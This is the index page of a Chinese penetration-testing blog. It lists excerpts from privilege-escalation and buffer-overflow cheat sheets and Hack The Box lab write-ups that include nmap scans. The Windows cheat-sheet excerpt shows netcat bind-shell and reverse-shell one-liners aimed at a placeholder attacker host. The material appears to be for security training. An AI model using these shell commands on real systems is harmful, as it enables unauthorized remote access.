Posts
Windows 提权 备忘录
· ☕ 8 分钟 · ✍️ IceKam
从RCE到Shell 在有限的解释器中获取shell: $ system("start cmd.exe /k $cmd") 将cmd绑定到端口: $ nc.exe -Lp 31337 -vv -e cmd.exe Reverse shell: $ nc.exe attacker_ip attacker_port -e cmd.exe 0:系统信息 查找已安装的软件

缓冲区溢出 备忘录
· ☕ 4 分钟 · ✍️ IceKam
简介 这是一个缓冲区溢出 的备忘录,涵盖了常用姿势。 身份识别 第一步是识别漏洞。您可以调试该应用并使用较大的字符串对其进行模糊处理,并确定导致崩溃

Linux 渗透测试 提权 备忘录
· ☕ 4 分钟 · ✍️ IceKam
简介 这是一个Linux 提取的备忘录,涵盖了大部分常用姿势,本文为原创作品。 获得shell后 获得交互 Shell 1 $ python -c 'import pty;pty.spawn("/bin/bash")' 如果失败可设置PATH TER

Ehtools Wifi 渗透测试框架
· ☕ 1 分钟 · ✍️ IceKam
简介 Wi-Fi工具不断为初学者和Ehtools框架提供越来越多的访问权限。 是认真渗透工具的框架,可以从其中轻松进行探索。 这个强大而简单的工具

Active 练习记录
· ☕ 2 分钟 · ✍️ IceKam
环境介绍: 名称:Active 系统:Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.100 系统为Windows Server,端口53、88、135、139、

Bastion 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Bastion 系统:Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.134 系统为Windows Server,端口22、135、139、44

Access 练习记录
· ☕ 4 分钟 · ✍️ IceKam
环境介绍: 名称:Access 系统:Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.93 系统为Windows Server 2008 R2 - 2012,端口21、80、telnet

Netmon 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Netmon 系统:Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.93 系统为Windows Server 2008 R2 - 2012,端口21、80开放,部署有P

Bounty 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Bounty 系统:Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ nmap -A 10.10.10.93 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 10:20 CST Nmap scan report for 10.10.10.93 Host is up (0.34s latency).

Blue 练习记录
· ☕ 3 分钟 · ✍️ IceKam
环境介绍: 名称:Blue 系统:Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 $ nmap -A 10.10.10.40 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 15:22 CST Nmap scan report for 10.10.10.40 Host is up (0.34s

Granny 练习记录
· ☕ 5 分钟 · ✍️ IceKam
环境介绍: 名称:Granny 系统:Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ nmap -sV -O -F -oA Granny --version-light 10.10.10.15 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 14:01 CST Nmap scan report for 10.10.10.15

Grandpa 练习记录
· ☕ 4 分钟 · ✍️ IceKam
环境介绍: 名称:Grandpa 系统:Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 $ nmap -sV -O -F -oA Grandpa --version-light 10.10.10.14 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 09:19 CST Nmap scan report for 10.10.10.14 Host is up